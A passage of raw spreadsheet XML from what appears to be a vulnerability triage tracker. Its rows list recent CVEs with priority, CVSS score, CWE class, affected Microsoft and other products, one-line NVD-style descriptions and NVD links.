for exploitation.</t></is></c><c r="T462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t></is></c></row><row r="463"><c r="A463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C463" s="5" t="inlineStr"><is><t>CVE-2026-58846</t></is></c><c r="D463" s="5" t="n"><v>7.8</v></c><c r="E463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F463" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G463" s="5" t="inlineStr" /><c r="H463" s="5" t="n"><v>0.001</v></c><c r="I463" s="5" t="inlineStr" /><c r="J463" s="5" t="inlineStr" /><c r="K463" s="5" t="inlineStr" /><c r="L463" s="5" t="inlineStr" /><c r="M463" s="5" t="inlineStr" /><c r="N463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q463" s="5" t="inlineStr" /><c r="R463" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S463" s="5" t="inlineStr"><is><t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t></is></c></row><row r="464"><c r="A464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C464" s="5" t="inlineStr"><is><t>CVE-2026-58874</t></is></c><c r="D464" s="5" t="n"><v>7.8</v></c><c r="E464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F464" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G464" s="5" t="inlineStr" /><c r="H464" s="5" t="n"><v>0.001</v></c><c r="I464" s="5" t="inlineStr" /><c r="J464" s="5" t="inlineStr" /><c r="K464" s="5" t="inlineStr" /><c r="L464" s="5" t="inlineStr" /><c r="M464" s="5" t="inlineStr" /><c r="N464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q464" s="5" t="inlineStr" /><c r="R464" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S464" s="5" t="inlineStr"><is><t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t></is></c></row><row r="465"><c r="A465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C465" s="5" t="inlineStr"><is><t>CVE-2026-58941</t></is></c><c r="D465" s="5" t="n"><v>7.8</v></c><c r="E465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G465" s="5" t="inlineStr" /><c r="H465" s="5" t="n"><v>0.001</v></c><c r="I465" s="5" t="inlineStr" /><c r="J465" s="5" t="inlineStr" /><c r="K465" s="5" t="inlineStr" /><c r="L465" s="5" t="inlineStr" /><c r="M465" s="5" t="inlineStr" /><c r="N465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q465" s="5" t="inlineStr" /><c r="R465" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S465" s="5" t="inlineStr"><is><t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t></is></c></row><row r="466"><c r="A466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C466" s="5" t="inlineStr"><is><t>CVE-2026-62697</t></is></c><c r="D466" s="5" t="n"><v>7.8</v></c><c r="E466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F466" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G466" s="5" t="inlineStr" /><c r="H466" s="5" t="n"><v>0.003</v></c><c r="I466" s="5" t="inlineStr" /><c r="J466" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K466" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L466" s="5" t="inlineStr" /><c r="M466" s="5" t="inlineStr" /><c r="N466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P466" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q466" s="5" t="inlineStr" /><c r="R466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S466" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t></is></c></row><row r="467"><c r="A467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C467" s="5" t="inlineStr"><is><t>CVE-2026-62804</t></is></c><c r="D467" s="5" t="n"><v>7.8</v></c><c r="E467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F467" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G467" s="5" t="inlineStr" /><c r="H467" s="5" t="n"><v>0.003</v></c><c r="I467" s="5" t="inlineStr" /><c r="J467" s="5" t="inlineStr" /><c r="K467" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L467" s="5" t="inlineStr" /><c r="M467" s="5" t="inlineStr" /><c r="N467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q467" s="5" t="inlineStr" /><c r="R467" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S467" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t></is></c><c r="T467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t></is></c></row><row r="468"><c r="A468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C468" s="5" t="inlineStr"><is><t>CVE-2026-62810</t></is></c><c r="D468" s="5" t="n"><v>7.8</v></c><c r="E468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F468" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G468" s="5" t="inlineStr" /><c r="H468" s="5" t="n"><v>0.002</v></c><c r="I468" s="5" t="inlineStr" /><c r="J468" s="5" t="inlineStr" /><c r="K468" s="5" t="inlineStr" /><c r="L468" s="5" t="inlineStr" /><c r="M468" s="5" t="inlineStr" /><c r="N468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P468" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q468" s="5" t="inlineStr" /><c r="R468" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S468" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t></is></c></row><row r="469"><c r="A469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C469" s="5" t="inlineStr"><is><t>CVE-2026-68787</t></is></c><c r="D469" s="5" t="n"><v>7.8</v></c><c r="E469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F469" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G469" s="5" t="inlineStr" /><c r="H469" s="5" t="n"><v>0.002</v></c><c r="I469" s="5" t="inlineStr" /><c r="J469" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K469" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L469" s="5" t="inlineStr" /><c r="M469" s="5" t="inlineStr" /><c r="N469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P469" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q469" s="5" t="inlineStr" /><c r="R469" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S469" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t></is></c><c r="T469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t></is></c></row><row r="470"><c r="A470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C470" s="5" t="inlineStr"><is><t>CVE-2026-68832</t></is></c><c r="D470" s="5" t="n"><v>7.8</v></c><c r="E470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F470" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G470" s="5" t="inlineStr" /><c r="H470" s="5" t="n"><v>0.002</v></c><c r="I470" s="5" t="inlineStr" /><c r="J470" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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0" s="5" t="inlineStr" /><c r="M470" s="5" t="inlineStr" /><c r="N470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q470" s="5" t="inlineStr" /><c r="R470" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S470" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t></is></c></row><row r="471"><c r="A471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C471" s="5" t="inlineStr"><is><t>CVE-2026-68841</t></is></c><c r="D471" s="5" t="n"><v>7.8</v></c><c r="E471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F471" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G471" s="5" t="inlineStr" /><c r="H471" s="5" t="n"><v>0.002</v></c><c r="I471" s="5" t="inlineStr" /><c r="J471" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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1" s="5" t="inlineStr" /><c r="M471" s="5" t="inlineStr" /><c r="N471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q471" s="5" t="inlineStr" /><c r="R471" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S471" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t></is></c></row><row r="472"><c r="A472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C472" s="5" t="inlineStr"><is><t>CVE-2026-68844</t></is></c><c r="D472" s="5" t="n"><v>7.8</v></c><c r="E472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F472" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G472" s="5" t="inlineStr" /><c r="H472" s="5" t="n"><v>0.003</v></c><c r="I472" s="5" t="inlineStr" /><c r="J472" s="5" t="inlineStr" /><c r="K472" s="5" t="inlineStr" /><c r="L472" s="5" t="inlineStr" /><c r="M472" s="5" t="inlineStr" /><c r="N472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P472" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q472" s="5" t="inlineStr" /><c r="R472" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S472" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t></is></c></row><row r="473"><c r="A473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C473" s="5" t="inlineStr"><is><t>CVE-2026-68845</t></is></c><c r="D473" s="5" t="n"><v>7.8</v></c><c r="E473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F473" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G473" s="5" t="inlineStr" /><c r="H473" s="5" t="n"><v>0.003</v></c><c r="I473" s="5" t="inlineStr" /><c r="J473" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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3" s="5" t="inlineStr" /><c r="M473" s="5" t="inlineStr" /><c r="N473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P473" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q473" s="5" t="inlineStr" /><c r="R473" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S473" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t></is></c></row><row r="474"><c r="A474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C474" s="5" t="inlineStr"><is><t>CVE-2026-68848</t></is></c><c r="D474" s="5" t="n"><v>7.8</v></c><c r="E474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F474" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G474" s="5" t="inlineStr" /><c r="H474" s="5" t="n"><v>0.002</v></c><c r="I474" s="5" t="inlineStr" /><c r="J474" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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4" s="5" t="inlineStr" /><c r="M474" s="5" t="inlineStr" /><c r="N474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P474" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q474" s="5" t="inlineStr" /><c r="R474" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S474" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t></is></c></row><row r="475"><c r="A475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C475" s="5" t="inlineStr"><is><t>CVE-2026-68850</t></is></c><c r="D475" s="5" t="n"><v>7.8</v></c><c r="E475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G475" s="5" t="inlineStr" /><c r="H475" s="5" t="n"><v>0.002</v></c><c r="I475" s="5" t="inlineStr" /><c r="J475" s="5" t="inlineStr" /><c r="K475" s="5" t="inlineStr" /><c r="L475" s="5" t="inlineStr" /><c r="M475" s="5" t="inlineStr" /><c r="N475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P475" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q475" s="5" t="inlineStr" /><c r="R475" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S475" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t></is></c></row><row r="476"><c r="A476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C476" s="5" t="inlineStr"><is><t>CVE-2026-68875</t></is></c><c r="D476" s="5" t="n"><v>7.8</v></c><c r="E476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G476" s="5" t="inlineStr" /><c r="H476" s="5" t="n"><v>0.002</v></c><c r="I476" s="5" t="inlineStr" /><c r="J476" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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76" s="5" t="inlineStr" /><c r="M476" s="5" t="inlineStr" /><c r="N476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P476" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q476" s="5" t="inlineStr" /><c r="R476" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S476" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t></is></c><c r="T476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t></is></c></row><row r="477"><c r="A477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C477" s="5" t="inlineStr"><is><t>CVE-2026-68877</t></is></c><c r="D477" s="5" t="n"><v>7.8</v></c><c r="E477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F477" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G477" s="5" t="inlineStr" /><c r="H477" s="5" t="n"><v>0.002</v></c><c r="I477" s="5" t="inlineStr" /><c r="J477" s="5" t="inlineStr" /><c r="K477" s="5" t="inlineStr" /><c r="L477" s="5" t="inlineStr" /><c r="M477" s="5" t="inlineStr" /><c r="N477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q477" s="5" t="inlineStr" /><c r="R477" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S477" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t></is></c></row><row r="478"><c r="A478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C478" s="5" t="inlineStr"><is><t>CVE-2026-68885</t></is></c><c r="D478" s="5" t="n"><v>7.8</v></c><c r="E478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F478" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G478" s="5" t="inlineStr" /><c r="H478" s="5" t="n"><v>0.003</v></c><c r="I478" s="5" t="inlineStr" /><c r="J478" s="5" t="inlineStr" /><c r="K478" s="5" t="inlineStr" /><c r="L478" s="5" t="inlineStr" /><c r="M478" s="5" t="inlineStr" /><c r="N478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q478" s="5" t="inlineStr" /><c r="R478" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S478" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t></is></c></row><row r="479"><c r="A479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C479" s="5" t="inlineStr"><is><t>CVE-2026-68888</t></is></c><c r="D479" s="5" t="n"><v>7.8</v></c><c r="E479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F479" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G479" s="5" t="inlineStr" /><c r="H479" s="5" t="n"><v>0.003</v></c><c r="I479" s="5" t="inlineStr" /><c r="J479" s="5" t="inlineStr" /><c r="K479" s="5" t="inlineStr" /><c r="L479" s="5" t="inlineStr" /><c r="M479" s="5" t="inlineStr" /><c r="N479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q479" s="5" t="inlineStr" /><c r="R479" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S479" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t></is></c></row><row r="480"><c r="A480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C480" s="5" t="inlineStr"><is><t>CVE-2026-68890</t></is></c><c r="D480" s="5" t="n"><v>7.8</v></c><c r="E480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G480" s="5" t="inlineStr" /><c r="H480" s="5" t="n"><v>0.002</v></c><c r="I480" s="5" t="inlineStr" /><c r="J480" s="5" t="inlineStr" /><c r="K480" s="5" t="inlineStr" /><c r="L480" s="5" t="inlineStr" /><c r="M480" s="5" t="inlineStr" /><c r="N480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q480" s="5" t="inlineStr" /><c r="R480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t></is></c></row><row r="481"><c r="A481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C481" s="5" t="inlineStr"><is><t>CVE-2026-68892</t></is></c><c r="D481" s="5" t="n"><v>7.8</v></c><c r="E481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G481" s="5" t="inlineStr" /><c r="H481" s="5" t="n"><v>0.002</v></c><c r="I481" s="5" t="inlineStr" /><c r="J481" s="5" t="inlineStr" /><c r="K481" s="5" t="inlineStr" /><c r="L481" s="5" t="inlineStr" /><c r="M481" s="5" t="inlineStr" /><c r="N481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q481" s="5" t="inlineStr" /><c r="R481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t></is></c></row><row r="482"><c r="A482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C482" s="5" t="inlineStr"><is><t>CVE-2026-68896</t></is></c><c r="D482" s="5" t="n"><v>7.8</v></c><c r="E482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F482" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G482" s="5" t="inlineStr" /><c r="H482" s="5" t="n"><v>0.004</v></c><c r="I482" s="5" t="inlineStr" /><c r="J482" s="5" t="inlineStr" /><c r="K482" s="5" t="inlineStr" /><c r="L482" s="5" t="inlineStr" /><c r="M482" s="5" t="inlineStr" /><c r="N482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P482" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q482" s="5" t="inlineStr" /><c r="R482" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S482" s="5" t="inlineStr"><is><t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t></is></c></row><row r="483"><c r="A483" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C483" s="5" t="inlineStr"><is><t>CVE-2026-69265</t></is></c><c r="D483" s="5" t="n"><v>7.8</v></c><c r="E483" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F483" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G483" s="5" t="inlineStr" /><c r="H483" s="5" t="n"><v>0.002</v></c><c r="I483" s="5" t="inlineStr" /><c r="J483" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K48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83" s="5" t="inlineStr" /><c r="M483" s="5" t="inlineStr" /><c r="N483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q483" s="5" t="inlineStr" /><c r="R483" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S483" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t></is></c></row><row r="484"><c r="A484" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C484" s="5" t="inlineStr"><is><t>CVE-2026-69269</t></is></c><c r="D484" s="5" t="n"><v>7.8</v></c><c r="E484" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G484" s="5" t="inlineStr" /><c r="H484" s="5" t="n"><v>0.003</v></c><c r="I484" s="5" t="inlineStr" /><c r="J484" s="5" t="inlineStr" /><c r="K484" s="5" t="inlineStr" /><c r="L484" s="5" t="inlineStr" /><c r="M484" s="5" t="inlineStr" /><c r="N484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P484" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q484" s="5" t="inlineStr" /><c r="R484" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S484" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t></is></c></row><row r="485"><c r="A485" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C485" s="5" t="inlineStr"><is><t>CVE-2026-69270</t></is></c><c r="D485" s="5" t="n"><v>7.8</v></c><c r="E485" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G485" s="5" t="inlineStr" /><c r="H485" s="5" t="n"><v>0.002</v></c><c r="I485" s="5" t="inlineStr" /><c 